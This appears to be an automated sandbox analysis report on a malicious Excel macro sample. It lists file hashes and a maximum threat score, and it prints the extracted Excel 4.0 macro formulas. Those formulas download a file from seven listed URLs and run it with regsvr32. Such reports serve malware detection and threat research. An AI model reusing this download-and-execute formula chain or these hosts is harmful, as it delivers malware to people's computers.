Overview

overview

10

Static

static

10

f79f25604a...5.xlsm

windows7-x64

10

f79f25604a...5.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25

  • Size

    38KB

  • Sample

    241120-3dlfyawjat

  • MD5

    68bb87d405663f89976f2646ce87a7d5

  • SHA1

    01b51b47b141f27baa890dd6781d86cb4ddb19c7

  • SHA256

    f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25

  • SHA512

    91411e57372cbdf67fc175da34a4202a44788c43c2f2ef6278a854eff4a4b63badf3dfa20b7e1edd848295d8228152bf6410b95c0d4fecfe695351592f64bb8d

  • SSDEEP

    768:3+d/GCR8UjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyu:3WT9OZZ1ZYpoQ/pMAeVIy08a

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/

https://alicehui.com/pics/yjGo0PrY/

https://albassiria.ma/EhT0YlEAF7/XsmBCt/

https://vika.pl/backup/Q4bAjod4QKE6epp/

https://andiso.dk/limny/2ZTmq/

https://www.impactad.co.kr/images/EDltKgE5p/

https://babylee.cl/site/sTBIv21f/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alicehui.com/pics/yjGo0PrY/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://albassiria.ma/EhT0YlEAF7/XsmBCt/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vika.pl/backup/Q4bAjod4QKE6epp/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://andiso.dk/limny/2ZTmq/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.impactad.co.kr/images/EDltKgE5p/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://babylee.cl/site/sTBIv21f/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
xlm40.dropper

https://alicehui.com/pics/yjGo0PrY/
xlm40.dropper

https://albassiria.ma/EhT0YlEAF7/XsmBCt/
xlm40.dropper

https://vika.pl/backup/Q4bAjod4QKE6epp/
xlm40.dropper

https://andiso.dk/limny/2ZTmq/
xlm40.dropper

https://www.impactad.co.kr/images/EDltKgE5p/
xlm40.dropper

https://babylee.cl/site/sTBIv21f/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/

Targets

    • Target

      f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25

    • Size

      38KB

    • MD5

      68bb87d405663f89976f2646ce87a7d5

    • SHA1

      01b51b47b141f27baa890dd6781d86cb4ddb19c7

    • SHA256

      f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25

    • SHA512

      91411e57372cbdf67fc175da34a4202a44788c43c2f2ef6278a854eff4a4b63badf3dfa20b7e1edd848295d8228152bf6410b95c0d4fecfe695351592f64bb8d

    • SSDEEP

      768:3+d/GCR8UjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyu:3WT9OZZ1ZYpoQ/pMAeVIy08a

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks